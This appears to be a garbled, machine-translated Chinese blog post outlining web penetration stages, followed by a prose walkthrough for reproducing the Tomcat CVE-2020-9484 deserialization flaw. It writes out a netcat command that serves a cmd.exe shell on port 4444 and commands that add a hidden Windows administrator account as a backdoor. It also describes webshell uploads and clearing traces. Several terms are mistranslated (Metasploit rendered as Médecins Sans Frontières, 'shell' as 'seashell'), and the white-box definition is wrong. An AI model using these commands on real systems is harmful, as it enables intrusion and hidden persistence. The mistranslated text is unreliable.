web渗透是什么?

网站测试分为白盒测试,白盒测试是指在不访问源代码等信息的情况下访问目标网站,相当于代码分析和审计。
黑盒测试涉及在不知情的情况下渗透网站的系统信息。
Web渗透分为以下几个步骤:信息收集、漏洞扫描、漏洞利用、杠杆增强、内网渗透、后门提取、踪迹清理。
登录的大致思路就是看是否有注入漏洞,然后注入后端获取后端admin账号和密码,上传小马,然后通过小马上传小马,提权,转发内网,渗透内网,扫描内网和幸存的主机并打开其主机可以利用的漏洞(nessus);检查端口(nmap)的相关服务和潜在漏洞。
他们被用来摧毁互联网、留下后门并清除痕迹(无国界医生组织)。
或者查一下有没有上传文件的地方,上传一句木马然后用菜刀连接,访问数据库执行cmd命令,然后进马来西亚……想法很多,很多次。
可能会不成功。
数据收集是该过程的首要任务。
DNS域名信息:通过查找正确的IP、子域名(层子域名爆机)、侧站(K8侧站、御剑1.5)、C类、网站负责人以及信息(谁提出请求)URL信息:服务器操作系统、服务器类型和版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型、常见网站组合:ASP和ASPX:ACCESS、SQLServerPHP:MySQL、PostgreSQLJSP:Oracle、MySQL敏感目录信息(于健、dirbust)开放端口信息(nmp)漏洞扫描AWVS、AppScan、OWASP-ZAP等它可以预先扫描网站漏洞,看看是否存在可利用的漏洞。
常见漏洞:SQL注入漏洞、未授权访问漏洞、目录流量漏洞、任意文件读取/下载漏洞。
(Hydra)当我们提升权限并获得shell后,我们的权限可能会非常低,所以自己升级的话,可以根据服务器版本相关的弱点来增加多样性。
首先,成功后执行exe公网主机ip4444互联网主机的连接转发。
你可以得到一个贝壳。

在本地主机上执行:nc-l-p4444-t-ecmd.exe在本地主机上执行:nc-vv远程主机ip4444成功。
您可以使用主机漏洞扫描器。
使用工具(nessus、x-scan等)查看是否有可用的漏洞,也可以使用nmap扫描幸存的主机和端口,msf会检测端口中对应的漏洞并允许其登录到shell中。
在网络上留下后门,让木马从后面上传退出,可以使用hideadmin为Windows用户创建一个超级隐藏账户:netusertest$123456/addnetlocalgroupadministratorstest$/add,你要改记录也看不到。
最好使用工具来节省压力和精力。

TomcatSession(CVE-2020-9484)反序列化复现

ApacheTomcat远程代码执行风险分析ApacheTomcat,开源的Web应用服务器主要实现JavaEE规范中的Servlet和JSP,并提供HTTP服务。
它由SunMicrosystems于1999年开发,并于2005年捐赠给ASF(Apache软件基金会)。
现在它是一个独立的旗舰项目。
Tomcat是一个针对中小型系统、并发访问极少的高效服务,适合初学者开发和调试JSP程序。
它作为Apache服务器的扩展运行独立进程,并具有轻量级应用程序服务器功能。
CVE-2020-9484:Tomcat反序列化漏洞2020年5月20日Apache造成Tomcat远程代码执行风险漏洞编号CVE-2020-9484已正式公布。
如果配置无效(没有使用encryptInterceptor);当Tomcat使用内置会话同步功能时,存在此漏洞。
成功利用此漏洞必须满足四个条件:攻击者错误地将SessionAttributeValueClassNameFilter配置为使用服务器文件内容和名称持久性;攻击者可以提供转储的对象以及攻击者可以控制的文件的相对路径。
受影响的ApacheTomcat版本包括:10.0.0-M1至10.0.0-M4;9.0.0.M1至9.0.34;8.5.0至8.5.54和7.0.0至7.0.103。
源码分析根据配置来分析Tomcat源码。
以Tomcat10.0.0-M4为例,注意FileStore的load方法,该方法首先将sessionid转换为fileobject,并检查文件是否存在。
读取文件内容(如果有)。
文件对象附加“.session”扩展名,但目录路径未经过验证。
当文件是系统执行CustomObjectInputStream来获取小工具类并执行反序列化操作。
安装环境安装Tomcat;具体安装教程,请参阅相关链接。
下载Tomcat10.0.0-M4,创建tomcat目录并解压文件。
编辑conf目录中的context.xml文件以添加管理器配置。
下载groovy-2.3.9.jar并将其放在lib目录中。
执行wget命令下载依赖,执行catalina.sh启动Tomcat。
访问ip:8080验证安装是否成功。
重现漏洞;使用ysoserial生成Java反序列化payload,并运行java命令生成payload文件。
将包含有问题的JSESSIONID值的cookie添加到浏览器。
或者直接通过curl命令加载恶意会话持久化文件。
运行ls/tmp查看结果。
修复包括升级Tomcat版本;修复此漏洞涉及修复WAF过滤或避免使用FileStore。
免责声明:对于本项目仅供安全人员用于完成批准的项目测试和学习交流,不涉及漏洞利用或攻击行为。
使用时遵守当地法律法规,避免未经授权的测试。